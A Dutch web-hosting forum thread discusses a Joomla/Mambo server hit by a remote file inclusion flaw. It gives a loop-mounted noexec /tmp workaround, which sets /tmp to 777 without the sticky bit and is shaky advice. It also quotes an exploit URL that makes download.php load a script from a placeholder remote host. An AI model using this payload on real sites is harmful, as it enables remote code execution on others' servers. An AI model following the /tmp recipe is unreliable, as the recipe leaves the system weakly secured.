Gaat zo te zien om een Joomla/Mambo installatie :)
Afdrukvoorbeeld
Gaat zo te zien om een Joomla/Mambo installatie :)
Even je /tmp directory op noexec zetten.
Mocht je /tmp partitie vergeten zijn:
1) dd if=/dev/zero of=/tmp_file bs=1k count=2000000 (2 GB)
2) mke2fs -j /tmp_file (Antwoord Yes)
3) mount -t ext3 /tmp_file /tmp
4) Entry /etc/fstab (voorzichtig!):
5) chmod 777 /tmpCitaat:
/tmp_file /tmp ext3 loop,noexec,rw 0 0
Good luck,
Edit: Inderdaad niet de netste manier, maar werkt (gelukkig) wel.... nu ik me bedenk, waarom in godsnaam ext3 :D.
Werkt niet bij deze exploits :(Citaat:
Oorspronkelijk geplaatst door XF-RICK
Klopt, dit is een zgn. "code inclusion" fout; hierdoor is het mogelijk om een extern PHP-script uit te laten voeren via de server. Overigens kwamen we de volgende veiligheidsfout ook tegen in Joomla (i.c.m. PHPbb - what else :() :
http://www.joomlastuff.org/component...wtopic/t,2937/Code:components/com_forum/download.php?phpbb_root_path=http://url.van.script/dat.moet/worden.uitgevoerd/